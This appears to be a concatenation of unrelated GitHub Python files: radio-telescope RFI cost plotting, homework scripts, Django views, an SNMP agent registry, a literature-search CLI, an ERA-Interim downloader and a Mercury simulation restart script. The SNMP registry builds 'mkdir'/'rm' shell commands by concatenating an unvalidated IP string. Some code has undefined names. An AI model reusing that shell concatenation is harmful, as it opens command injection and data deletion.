roi_cls_locs,roi_scores,rois,roi_indices","repo_name":"PanJason/PlateDetection","sub_path":"model/fasterRCNN_frame.py","file_name":"fasterRCNN_frame.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74316727610","text":"import numpy as np\nimport pylab as pl\nimport matplotlib\nimport pandas as pd\npl.ion()\n\n#execfile('rfichar.py')\n#execfile('ngvlapar.py')\n\nfrom rfichar import *\nfrom ngvlapar import *\n\n\n\"\"\"\nRFI solutions\n\"\"\"\nsolutions = {\n'A':{'desc':\"Antenna based high resolution flagging\", \n \"Effort\":\"Medium\", \"Risk\" : \"low\", \"Gains\" : \"High\", \n 'datares':np.array([1e-10, 1e-09, 1e-08]),## Data windows are 100 times higher.\n 'chanres':1e+6}, ## (in kHz) nanosec pulses, 1GHz bw.\n'B':{'desc':\"Baseline based high resolution flagging\", \n \"Effort\" : \"Medium\", \"Risk\" : \"low\", \"Gains\" : \"Medium\",\n# 'datares' : np.array([1e-07, 1e-06, 1e-05, 1e-04, 1e-03, 1e-02]),\n 'datares' : np.array([1e-05, 1e-04, 1e-03, 1e-02]),\n 'chanres' : 100.0},\n'C':{'desc':\"High resolution modeling and subtraction\", \n \"Effort\" :\"High\", \"Risk\" : \"high\", \"Gains\" : \"High\",\n 'datares' : np.array([1e-06, 1e-05, 1e-04, 1e-03]),\n 'chanres' : 10.0 },\n'D': {'desc':\"Post-processing flagging\",\n 
\"Effort\" : \"Low\", \"Risk\" : \"low\", \"Gains\" : \"Low\",\n 'datares' : np.array([0.1, 1.0, 10.0]),\n 'chanres' : 1e+3}\n}\n\n#Type E : smart scheduling in time/freq/direction ( Effort : Medium, Risk : Low, Gains : High )\n\ndef cost_of_solutions():\n \n ## Base cost is type D, defined in terms of numbers of visibilities, with 0.1 sec timesteps and 2k channels per band. . \n timeress = pl.exp(pl.arange(-10,3))\n \n pl.figure(3)\n pl.clf()\n\n cols = {'A':'red', 'B':'blue', 'C': 'orange', 'D':'green'}\n labs = {'A':'Antenna-based Flagging', 'B':'In-correlator Flagging', 'C': 'Modeling and subtraction', 'D':'Post Processing Flagging'}\n\n for sol in ['A','B','C','D']:\n ## ntimesteps per 1 sec and nchan per 1MHz (1e+3 kHz)\n\n tres = 1.0 ## ntimes in 1 second.\n fres = 1e+5 ## nchans in 100 MHz ( 1e+5 kHz ) : 1 spw. \n\n ntimes = tres / solutions[sol]['datares'] \n nchans = fres / solutions[sol]['chanres'] \n npol = 4\n\n volperchunk = 1\n parwidth = 1 ## Parallelization by N times\n\n totalvol = totalants * ntimes * nchans * npol\n\n if sol=='A':\n parwidth = 'antenna'\n parquant = totalants\n if sol=='B':\n parwidth = 'baseline'\n parquant = totalvis\n if sol=='C':\n parwidth = 'time,freq'\n parquant = ntimes*nchans\n if sol=='D':\n parwidth = 'baseline'\n parquant = totalvis\n\n volperchunk = totalvol / (parquant)\n\n\n# pl.subplot(211)\n pl.plot(solutions[sol]['datares'], (totalvol), '.-', color=cols[sol], label=labs[sol])\n pl.plot(solutions[sol]['datares'], volperchunk, '.--', color=cols[sol] , label=labs[sol] + ' [ parallelize on ' + parwidth + ']')\n \n# pl.subplot(212)\n# pl.plot(solutions[sol]['datares'], parquant, '.-', color=cols[sol] , label=sol+', partitioned by '+parwidth)\n \n\n# pl.subplot(211)\n pl.xscale('log')\n pl.yscale('log')\n pl.legend()\n# pl.xlabel('Data time resolution (sec)')\n pl.ylabel('N samples [ per '+str(tres)+ ' sec, '+str(fres/1e+3) + ' MHz ]')\n pl.title('Data rates for RFI mitigation')\n pl.ylim(0.1,10e+18)\n pl.xlabel('Time resolution (sec) of RFI mitigation solutions')\n\n# pl.subplot(212)\n# pl.xscale('log')\n# pl.yscale('log')\n# pl.legend()\n# pl.xlabel('Data time resolution (sec)')\n# pl.ylabel('Parallelization width')\n \n pl.savefig('fig_rfi_mitigation_cost.png')\n","repo_name":"urvashirau/ngVLA-RFI-impact-simulator","sub_path":"RFI_Impact_Calculator/rfisol.py","file_name":"rfisol.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"29860220554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\njaparker_hw_4_2.py\r\nJefferson Parker\r\nClass: CS 521 - Spring 1\r\nDate: February 10, 2022\r\n\r\nQuantify the instance of each character in a sentence using a dictionary.\r\nIgnore case.\r\nPrint results to output.\r\n\"\"\"\r\n\r\n# Import modules\r\nimport string\r\n\r\n# Intiialize variables\r\nSENTENCE = \"The rain in Spain falls mainly on the plain.\"\r\ncount_dict = dict()\r\n\r\n# Case doesn't matter, make them all uppercase\r\n# Remove any punctuation characters.\r\n# Remove space characters.\r\nworking_sentence = SENTENCE.upper()\r\nworking_sentence = working_sentence.strip(string.punctuation)\r\nworking_sentence = working_sentence.replace(\" \", \"\")\r\n\r\n# Count the instances of each character in working_sentence.\r\nfor char in list(working_sentence):\r\n if char in count_dict:\r\n count_dict[char] += 1\r\n else:\r\n count_dict[char] = 1\r\n \r\n# Get the character(s) that have the maximum count.\r\ncount_max = 
max(list(count_dict.values()))\r\nchars_max = list()\r\n\r\nfor char in count_dict.keys():\r\n# print(char, \" \", count_dict[char])\r\n if count_dict[char] == count_max:\r\n chars_max.append(char)\r\n\r\nprint(\"The string being analyzed is: \\\"\", SENTENCE, \"\\\"\", sep=\"\")\r\nprint(\"1. Dictionary of letter counts: \", count_dict)\r\nprint(\"2. Most frequent letter(s)\", chars_max, \"appear\", count_max, \"times\")","repo_name":"japarker02446/BUProjects","sub_path":"CS521 Data Structures with Python/Homework4/japarker_hw_4_2.py","file_name":"japarker_hw_4_2.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35364127326","text":"#!/usr/bin/python3\n\"\"\"\nUsing what you did in task 0, extend\nyour python script to export data in the\njson format\n\"\"\"\n\nif __name__ == '__main__':\n import requests\n from sys import argv\n import json\n\n userId = argv[1]\n user_url = 'https://jsonplaceholder.typicode.com/users/{}/'.format(userId)\n todos_url = 'https://jsonplaceholder.typicode.com/users/{}/todos'.format(\n userId)\n todos = requests.get(url=todos_url)\n users = requests.get(user_url)\n if todos.status_code == 200 and users.status_code == 200:\n user_data = users.json()\n todo_data = todos.json()\n user_name = user_data.get('username')\n file_name = '{}.json'.format(userId)\n\n todo_list = []\n for todo in todo_data:\n data = {}\n data['task'] = todo.get('title')\n data['completed'] = todo.get('completed')\n data['username'] = user_name\n\n todo_list.append(data)\n\n json_data = {\n userId: todo_list\n }\n\n with open(file_name, 'w') as json_file:\n json.dump(json_data, json_file)\n","repo_name":"callmhejerry/alx-system_engineering-devops","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25506614265","text":"# calculate the sum of number from user n + nn + nnn\nnum = int(input(\"Entert a number: \"))\n\nnum1 = int(\"%d\" %num)\nnum2 = int(\"%d%d\" %(num, num))\nnum3 = int(\"%d%d%d\" %(num, num, num))\n\ncalculate = num1 + num2 + num3\n\nprint(\"Your caculate \" + str(num1) + \" + \" + str(num2) + \" + \" + str(num3) + \" = \" + str(calculate))\n","repo_name":"kietalang/python_intern","sub_path":"Python exercises/Python basic/exercise10.py","file_name":"exercise10.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74333687290","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom item.models import Department, Chicken\nfrom user.models import UserProfile\nfrom django.http import JsonResponse\n\n@login_required\ndef index(request):\n \n departments = Department.objects.all()\n \n\n \n return render(request, 'dashboard/index.html', {\n 'departments': departments,\n })\n\n@login_required\ndef chart_data(request):\n \n user_profile = UserProfile.objects.get(user=request.user)\n \n return JsonResponse({\n 'egg_amount': user_profile.int_array,\n })\n","repo_name":"KajetanMieloch/Django-Chick-Sim","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14150889554","text":"from Agente 
import Agente\nfrom RRD import RRD\nfrom SNMP import SNMP\nfrom os import system\nimport subprocess\nfrom pysnmp.hlapi import *\nimport threading\nfrom itertools import count\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport rrdtool\nimport time\nimport os\n\nclass Registro:\n    def __init__(self, nombre = \"agentes.txt\", agentes = [],\n                 datos =[['inMCast','1.3.6.1.2.1.31.1.1.1.2.2'],\n                         ['inPkt','1.3.6.1.2.1.4.9.0'],\n                         ['rspICMP', '1.3.6.1.2.1.5.21.0'],\n                         ['outSeg', '1.3.6.1.2.1.6.11.0'],\n                         ['inErrDGram', '1.3.6.1.2.1.7.3.0']]):\n        self.nombre = nombre\n        self.agentes = agentes\n        self.datos = datos\n\n    def importArch(self, arch = \"agentes.txt\"):\n        with open(arch, \"r\") as f:\n            lineas = f.readlines()\n        for line in lineas:\n            self.agentes.append(Agente(line.split()[0], line.split()[1], line.split()[2], line.split()[3]))\n        return\n\n    def pingUsuario(self, ip):\n        res = subprocess.Popen([\"ping\", \"-c\", \"1\" ,ip],stdout = subprocess.PIPE).communicate()[0]\n        if b'ttl=' in res:\n            return \"up\"\n        else:\n            return \"down\"\n\n    def agregarUsuario(self, agente):\n        self.agentes.append(agente)\n        f = open(self.nombre, \"a+\")\n        system(\"mkdir \" + agente.ip)\n        f.write(agente.ip + ' '+ agente.version+ ' '+ agente.comunidad+ ' '+ agente.interfaz + '\\n')\n        self.crearTodoRRD(agente.ip)\n        f.close()\n        return True\n\n    def eliminarUsuario(self, ip):\n        #print(\"Eliminando usuario \" + ip)\n        with open(self.nombre, \"r\") as f:\n            lines = f.readlines()\n        with open(self.nombre, \"w\") as f:\n            for line in lines:\n                if line.split()[0] != ip:\n                    f.write(line)\n        for file in os.listdir(ip):\n            system(\"rm \" + ip+ \"/\"+ file)\n        system(\"rmdir \" + ip)\n        for i,agente in enumerate(self.agentes):\n            if agente.ip == ip:\n                self.agentes.pop(i)\n        return True\n\n    def printUsuarios(self):\n        print(\"\\tip\\n\")\n        for i,ag in enumerate(self.agentes):\n            print(\"{}.\\t{}\\n\".format(i, ag.ip))\n        return\n\n    def printResumen(self):\n        print(\"#\\t ip\\t\\tversion\\tcomunidad\\t\\tinterfaz\\testado\\n\")\n        for i,ag in enumerate(self.agentes):\n            ping = self.pingUsuario(ag.ip)\n            print(\"{}.\\t {}\\t {}\\t {}\\t {}\\t\\t{}\\n\".format(i, ag.ip, ag.version, ag.comunidad, ag.interfaz, ping))\n        return\n\n    def crearTodoRRD(self, host):\n        for dato in self.datos:\n            RRD.crearRRD(host, dato[0])\n        return\n\n    def updateTodo(self):\n        threads = []\n        for agente in self.agentes:\n            t = threading.Thread(target=RRD.updateAgente,args=(agente, self.datos))\n            threads.append(t)\n            t.start()\n        return\n\n    def genGrafs(self, ventana):\n        for ag in self.agentes:\n            for dato in self.datos:\n                RRD.generarGrafica(ag, ventana, dato[0])\n        return\n\n    def animate(self, i):\n        data = pd.read_csv('data.csv')\n        x = data['x_value']\n        y1 = data['total_1']\n        y2 = data['total_2']\n\n        ax = plt.gca()\n        line1, line2 = ax.lines\n\n        line1.set_data(x, y1)\n        line2.set_data(x, y2)\n\n        xlim_low, xlim_high = ax.get_xlim()\n        ylim_low, ylim_high = ax.get_ylim()\n\n        ax.set_xlim(xlim_low, (x.max() + 5))\n\n        y1max = y1.max()\n        y2max = y2.max()\n        current_ymax = y1max if (y1max > y2max) else y2max\n\n        y1min = y1.min()\n        y2min = y2.min()\n        current_ymin = y1min if (y1min < y2min) else y2min\n\n        ax.set_ylim((current_ymin - 5), (current_ymax + 5))\n        return\n\n\n    def grafTiempoReal(self, agente, dato):\n        plt.style.use('fivethirtyeight')\n        x_vals = []\n        y_vals = []\n        index = count()\n        plt.plot([], [], label='Channel 1')\n        plt.plot([], [], label='Channel 2')\n        ani = FuncAnimation(plt.gcf(), self.animate, interval=1000)\n        plt.legend()\n        
plt.tight_layout()\n        plt.show()\n","repo_name":"carloslpz/Redes3","sub_path":"Problema2/Registro.py","file_name":"Registro.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5200614018","text":"import argparse\nimport asyncio\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom dotenv import load_dotenv\nfrom article import Article\nfrom cache import SearchCache\nfrom exporter import CSVExporter\nfrom search import SearchRequest, SearchToken\nfrom search_engine import SearchEngine\nfrom search_source import GoogleScholarSearch, IEEESearch, ACMSearch\n\n\ndef parse_args():\n\tparser = argparse.ArgumentParser(description='Systematic review')\n\t# Log arguments\n\tparser.add_argument(\n\t\t'--log-format', type=str,\n\t\tdefault='%(asctime)s %(levelname)s %(filename)s %(lineno)d \"%(name)s\" \"%(message)s\"',\n\t\thelp='Log format',\n\t)\n\tparser.add_argument(\n\t\t'-v', '--log-level', default='INFO', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'],\n\t\thelp='Log level',\n\t)\n\n\t# Engine arguments\n\tparser.add_argument(\n\t\t'--sleep-between-calls', default=100.0, type=float, help='Time (ms) to sleep between calls'\n\t)\n\tparser.add_argument('--list-articles', default=False, help='List the articles found', action=\"store_true\")\n\t# Searches\n\tparser.add_argument('--term', action='append', help='Search terms')\n\tparser.add_argument('--title', action='append', help='Search titles')\n\tparser.add_argument('--author', action='append', help='Search authors')\n\n\t# Cache arguments\n\tparser.add_argument(\n\t\t'--cache-save-every', default=10, type=int, help='Saves cache every N new requests',\n\t)\n\tparser.add_argument('--cache-compress', default=False, help='Compress cache', action=\"store_true\")\n\tparser.add_argument('--cache-file-name', default='data/cache.sr', help='Cache file name')\n\tparser.add_argument(\n\t\t'--env-file-name', default=Path('..') / '.env', help='Environment file name',\n\t)\n\tparser.add_argument('--compact-cache-file', help='Creates a compacted cache file')\n\tparser.add_argument('--recover-compact-cache-file', help='Recover the cache file from the compacted one')\n\tparser.add_argument('--cache-searches', default=False, help='Prints searches in the cache', action=\"store_true\")\n\tparser.add_argument('--cache-sources', default=False, help='Prints sources in the cache', action=\"store_true\")\n\tparser.add_argument('--cache-list', default=False, help='Lists the articles in the cache', action=\"store_true\")\n\n\t# Sources\n\tparser.add_argument(\n\t\t'--source-google-scholar', default=False, help='Uses Google Scholar as source', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--google-scholar-use-proxy', default=False, help='Google Scholar should use proxy', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--source-ieee', default=False, help='Use IEEE as source (Requires API key)', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--source-acm', default=False, help='Use ACM as source', action=\"store_true\",\n\t)\n\tparser.add_argument(\n\t\t'--ignore-cache', default=False, help='Ignore the cache for the selected sources', action=\"store_true\",\n\t)\n\n\t# Exporters\n\tparser.add_argument('--export-csv', help='Filename for the CSV exporter')\n\n\t# TODO test score\n\tparser.add_argument(\n\t\t'--score', default='h_index', choices=['citations', 'h_index', 'i10_index'],\n\t\thelp='Score 
method',\n\t)\n\tparser.add_argument('--score-threshold', default=0, help='Lower bound for the score')\n\n\treturn parser.parse_args()\n\n\ndef article_simple_print(logger: logging.Logger, article: Article):\n\tauthors = f\"{article.author}\" if len(article.author) <= 3 else f\"{article.author[:1] + ['et al']}\"\n\tlogger.info(\n\t\tf\"Publisher: {article.publisher}, Journal: {article.journal}, title: {article.title},\"\n\t\tf\" authors: {authors}\"\n\t)\n\n\ndef build_search_engine(logger: logging.Logger, args) -> Optional[SearchEngine]:\n\tengine = SearchEngine(logger=logger)\n\tengine.save_every = args.cache_save_every\n\tengine.compress = args.cache_compress\n\tengine.cache_file_name = args.cache_file_name\n\tengine.sleep_between_calls_ms = args.sleep_between_calls\n\tif args.ignore_cache:\n\t\tengine.ignore_cache = True\n\n\tif args.source_google_scholar:\n\t\tengine.sources.append(GoogleScholarSearch(use_proxy=args.google_scholar_use_proxy))\n\tif args.source_ieee:\n\t\tieee_api_key = os.getenv('IEE_API_KEY')\n\t\tif not ieee_api_key:\n\t\t\tlogger.critical(\"Application is missing IEEE API key\")\n\t\t\treturn\n\t\tengine.sources.append(IEEESearch(api_key=ieee_api_key))\n\tif args.source_acm:\n\t\tengine.sources.append(ACMSearch())\n\n\tfor term in args.term or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Term, value=term))\n\tfor author in args.author or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Author, value=author))\n\tfor title in args.title or []:\n\t\tengine.requests.add(SearchRequest(token=SearchToken.Title, value=title))\n\n\treturn engine\n\n\nasync def main():\n\targs = parse_args()\n\tload_dotenv(dotenv_path=args.env_file_name)\n\n\tlogger = logging.getLogger(\"systematic_review\")\n\thandler = logging.StreamHandler()\n\thandler.setLevel(args.log_level)\n\thandler.setFormatter(logging.Formatter(args.log_format))\n\tlogger.addHandler(handler)\n\n\tengine = build_search_engine(logger, args)\n\tif not engine:\n\t\treturn -1\n\n\tawait engine.run()\n\tawait generate_output(args, engine, logger)\n\n\tif args.compact_cache_file:\n\t\tlogger.info(f\"Compressing {args.cache_file_name} into {args.compact_cache_file}\")\n\t\tcache = SearchCache.load(args.cache_file_name, compress=False)\n\t\tcache.dump(args.compact_cache_file, compress=True)\n\n\tif args.recover_compact_cache_file:\n\t\tlogger.info(f\"Decompressing {args.recover_compact_cache_file} into {args.cache_file_name}\")\n\t\tcache = SearchCache.load(args.recover_compact_cache_file, compress=True)\n\t\tcache.dump(args.cache_file_name, compress=False)\n\n\treturn 0\n\n\nasync def generate_output(args, engine: SearchEngine, logger: logging.Logger):\n\tif args.list_articles:\n\t\tfor article in engine.found_articles():\n\t\t\tarticle_simple_print(logger, article)\n\tlogger.info(f\"Found {len(engine.found_titles)} articles\")\n\n\tif args.cache_list:\n\t\tcount_unique = 0\n\t\tfor article in engine.cache.unique_articles():\n\t\t\tcount_unique += 1\n\t\t\tarticle_simple_print(logger, article)\n\t\tlogger.info(f\"{count_unique} unique articles in the cache\")\n\tlogger.info(f\"{len(engine.cache)} articles in the cache\")\n\n\texporters = [\n\t\t(args.export_csv, CSVExporter(';'))\n\t]\n\tfor file_name, exporter in exporters:\n\t\tif file_name:\n\t\t\twith open(file_name, 'x') as export_csv:\n\t\t\t\t# TODO test exporter\n\t\t\t\tawait exporter.write(export_csv, engine.cache.unique_articles())\n\t\t\t\t# async for it in exporter.prefix():\n\t\t\t\t# \texport_csv.write(it)\n\t\t\t\t# for article 
in engine.cache.unique_articles():\n\t\t\t\t# \tasync for it in exporter.content(article):\n\t\t\t\t# \t\texport_csv.write(it)\n\t\t\t\t# async for it in exporter.suffix():\n\t\t\t\t# \texport_csv.write(it)\n\n\tif args.cache_searches:\n\t\tlogger.info(f\"Searches:\")\n\t\tfor search in engine.cache.search_requests():\n\t\t\tlogger.info(f\"{search.token}: {search.value}\")\n\n\tif args.cache_sources:\n\t\tlogger.info(f\"Sources:\")\n\t\tfor source in engine.cache.sources():\n\t\t\tlogger.info(f\"{source}\")\n\n\nif __name__ == '__main__':\n\tloop = asyncio.get_event_loop()\n\tasyncio.set_event_loop(loop)\n\n\tloop.run_until_complete(main())\n","repo_name":"rodoufu/systematic-review","sub_path":"systematic-review/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1388190062","text":"seq = input(\"Enter 5 numbers separated by commas: \")\nlistSeq = seq.split(\",\")\nlistSeq = [float(i) for i in listSeq]\nsize = len(listSeq)\n\nif size != 5:\n\n    print(\"You should enter exactly 5 numbers\")\n\nelse: \n    total = 0\n    for i in listSeq:\n        total += i\n    average = total/5\n    print(\"The sum of the numbers entered is {} and the average is: {}\".format(total, average))\n\n","repo_name":"vianaclaus/Python-","sub_path":"entregar/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33085700084","text":"import os;\nfrom datetime import datetime, timedelta;\n\nfrom ...utils.dateutils import next_month\n\nfrom ..utils.send_email import send_email;\nfrom ..utils.compress_netcdf_file import compress_netcdf_file;\n\nfrom .ERAI_Downloader import ERAI_Downloader\n\nENDDATE = datetime(2019, 8, 1, 0)\n\nclass ERAI_General( ERAI_Downloader ):\n    def __init__(self, outdir, info = None, subject = None):\n\n        if info is None: info = INFO.copy() # NOTE: INFO is not defined in this module; it must be supplied by the importing context\n\n        super().__init__( verbose=True, netcdf=True, **info )\n\n        self.subject = subject\n        self.outdir = outdir\n\n    def download(self, start_year = None, start_month = None, email = None, delay = None):\n        '''\n        Purpose:\n            A function to download all ERA-I analysis variables at surface.\n        Inputs:\n            None; output files are written under self.outdir (set in __init__)\n        Keywords\n            start_year  : Year to start looking for data\n            start_month : Month to start looking for data\n            email       : email address to send error messages to\n            delay       : Delay from current date to download until. Must be\n                          a timedelta object. Default is to stop downloading\n                          data when the month and year are within 26 weeks of\n                          program start date\n        '''\n
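        # (added note) ENDDATE at the top of this module (2019-08-01) is a hard cap on how far the loop below downloads.\n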
        if start_year is None: start_year = 1979;\n        if start_month is None: start_month = 1;\n        if delay is None: delay = timedelta(weeks = 26);\n        date = datetime(start_year, start_month, 1)\n\n        while date <= ENDDATE:\n            self.set_date( date )\n            target = self.defaultTarget()\n            if not target:\n                print('Issue getting target name')\n                return\n            self.info['target'] = os.path.join( self.outdir, target )\n\n            fmt = ' {:2d}: {:40}' # Format for status messages in log file\n            self.log.info('Downloading: '+self.info['target']) # Print a message\n\n            attempt, max_attempt = 0, 5; # Set attempt and maximum attempt for downloading and compressing\n            while attempt < max_attempt: # Try up to max_attempt times to download and compress the file\n                super().download() # Download the data\n                if self.status < 2: # If the status returned by the download is less than 2, then the file downloaded and needs compressed\n                    self.log.info( fmt.format(attempt+1,\"Downloaded!\") ) # Print a message\n                    self.log.info( fmt.format(attempt+1,\"Compressing file...\") ) # Print a message\n                    status = compress_netcdf_file(self.info['target'], email=email, gzip=5, delete=True);# Compress the file\n                    if status == 0:\n                        attempt = max_attempt+1; # Leave the retry loop; download and compression succeeded\n                        self.log.info( fmt.format(attempt+1,\"Compressed!\") ); # Print a message\n                    else: # If the return status of the compression failed, then delete the downloaded file, increment the attempt counter and try to download/compress again\n                        attempt += 1; # Increment the attempt\n                        if status == 1 : \n                            msg = \"Output file exists and clobber was not set\"; # Set the message for status 1\n                        elif status == 2:\n                            msg = \"Data was NOT written correctly after three (3) attempts\"; # Set the message for status 2\n                        elif status == 3:\n                            msg = \"There was an error reading the data\"; # Set the message for status 3\n                        elif status == 4:\n                            msg = \"Input file doesn't exist\"; # Set the message for status 4\n                        self.log.info( fmt.format(attempt+1, msg) )\n                        if os.path.exists( self.info['target'] ): \n                            os.remove( self.info['target'] ); # If the downloaded file exists, delete it\n                elif self.status == 2: # If the return status of the download is 2, then the compressed file already exists\n                    self.log.info( fmt.format(attempt+1,\"Compressed file already exists!\") ) # Print a message\n                    attempt = max_attempt+1; # Leave the retry loop\n                else:\n                    if os.path.exists( self.info['target'] ):\n                        os.remove( self.info['target'] ); # If any other number was returned, delete the downloaded file if it exists\n                    attempt += 1; # Increment the attempt\n                if attempt == max_attempt: # If every attempt was used up, the file failed to download/compress and the program halts\n                    self.log.error( fmt.format(attempt+1,\"Reached maximum attempts\") ) # Print a message\n                    if email is not None: status = send_email(email, self.subject); # Send an email that the download failed (fixed: bare `subject` was an undefined name)\n                    return 1; # Exit status one (1)\n\n            date = next_month(date)\n        return 0;\n\nif __name__ == \"__main__\":\n    import argparse; # Import library for parsing\n    parser = argparse.ArgumentParser(description=\"ERA-Interim Analysis Pressure Levels Download\"); # Set the description of the script to be printed in the help doc, i.e., ./script -h\n    ### Data storage keywords; https://software.ecmwf.int/wiki/display/UDOC/Data+storage+keywords\n    parser.add_argument(\"outdir\", type=str, help=\"Top level directory for output\")\n
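    # (added) when -y/-m are omitted, download() falls back to 1979-01, the start of the ERA-Interim record.\n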
help=\"specifies start year\")\n parser.add_argument(\"-m\", \"--month\", type=int, help=\"specifies start month\")\n parser.add_argument(\"-e\", \"--email\", type=str, help=\"email address to send failed message to\")\n \n args = parser.parse_args()\n inst = ERAI_AN_SFC(args.outdir)\n status = inst.download( args.year, args.month, args.email );\n exit(status); # Exit status zero (0) on end\n","repo_name":"kwodzicki/Data_Downloading","sub_path":"data_downloading/ECMWF/ERAI/ERAI_General.py","file_name":"ERAI_General.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73298012731","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom scheduler.models import *\nimport time\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = User\n fields = ('id', 'url', 'username', 'email', 'first_name', 'last_name', 'is_superuser')\n\nclass VertexSerializer(serializers.HyperlinkedModelSerializer):\n active = serializers.SerializerMethodField(method_name='is_active')\n\n def is_active(self, vert):\n active_seconds = 15\n return (time.time() - active_seconds) <= vert.last_seen\n\n class Meta:\n model = Vertex\n fields = ('id', 'url', 'label', 'address', 'enabled', 'last_seen', 'active')\n\nclass EventRequestSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = EventRequest\n fields = ('id', 'url', 'requester', 'vertex_target', 'timestamp', 'json_text')\n","repo_name":"aoswalt/greenlite","sub_path":"server/scheduler/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74545181370","text":"#!/usr/bin/env python \n# script to continue a mercury simulation assuming that a new folder with all the files of the previous \n#simulations has been created and that we are in this directory \n# Version 1.0\n\nimport os\nimport subprocess\nimport mercury\n\ndef lancer_commande(commande):\n \"\"\"lance une commande qui sera typiquement soit une liste, soit une \n commande seule. 
    if (type(commande)==list):\n        process = subprocess.Popen(commande, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    elif (type(commande)==str):\n        process = subprocess.Popen(commande, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n    else:\n        raise TypeError(\"The command is neither a list nor a string.\")\n    (process_stdout, process_stderr) = process.communicate()\n    returncode = process.poll()\n    return (process_stdout, process_stderr, returncode)\n    \n# First, we need to get the dump files \nfiles_to_move = [\"param\", \"big\"]\n\nif os.path.exists(\"small.dmp\"):\n    files_to_move.append(\"small\")\n\nfor filename in files_to_move:\n    lancer_commande(\"mv \"+filename+\".dmp \"+filename+\".in\")\n\n# We delete output files\nlancer_commande(\"rm *.aei *.clo *.out\")\n\n# We delete temporary files (since the ones we were interested in were moved to *.in)\nlancer_commande(\"rm *.tmp *.dmp\")\n\nparamin = mercury.Param('', '', '', '', '')\nparamin.read()\n\nintegration_time = raw_input(\"For how long do you want to run the integration (in years)?\\n\")# In years\n\nparamin.stop_time = paramin.start_time + float(integration_time) * 365.25 # in days\n\nparamin.write()\n","repo_name":"EmelineBolmont/mercury-90","sub_path":"analysis/mercury-continue.py","file_name":"mercury-continue.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"2175431877","text":"from dist_system.protocol.base_protocol import BaseProtocol\nfrom dist_system.protocol.pb import slave_worker_pb2 as sw_proto\n\nmessage_table = {\n    'task_register_cmd': {\n        'this': sw_proto.TaskRegisterCMD,\n        'result_receiver_address': sw_proto.TaskRegisterCMD.ResultReceiverAddress,\n        'task': {\n            'sleep_task': sw_proto.TaskRegisterCMD.SleepTask,\n            'data_processing_task': sw_proto.TaskRegisterCMD.DataProcessingTask,\n            'tensorflow_train_task': sw_proto.TaskRegisterCMD.TensorflowTrainTask,\n            'tensorflow_test_task': sw_proto.TaskRegisterCMD.TensorflowTestTask,\n        },\n        'slave_address': sw_proto.TaskRegisterCMD.SlaveAddress,\n        'cloud_dfs_address': sw_proto.TaskRegisterCMD.CloudDFSAddress,\n    },\n    'worker_register_req': {\n        'this': sw_proto.WorkerRegisterRequest,\n    },\n    'worker_register_res': {\n        'this': sw_proto.WorkerRegisterResponse,\n    },\n    'task_cancel_req': {\n        'this': sw_proto.TaskCancelRequest,\n    },\n    'task_cancel_res': {\n        'this': sw_proto.TaskCancelResponse,\n    },\n    'task_finish_req': {\n        'this': sw_proto.TaskFinishRequest,\n    },\n    'task_finish_res': {\n        'this': sw_proto.TaskFinishResponse,\n    },\n}\n\nprotocol = BaseProtocol(sw_proto, message_table)\n\n\n# input : string, dict\n# output : bytes\ndef make_msg_data(header, body):\n    return protocol.make_msg_data(header, body)\n\n\n# input : bytes\n# output : (string, dict)\ndef parse_msg_data(msg_data):\n    return protocol.parse_msg_data(msg_data)\n","repo_name":"DrawML/dist-task","sub_path":"src/dist_system/protocol/slave_worker.py","file_name":"slave_worker.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"73293017531","text":"\"\"\"\n    Exercise 09\n\n    Write a program that receives a list of file names and prints them, one by 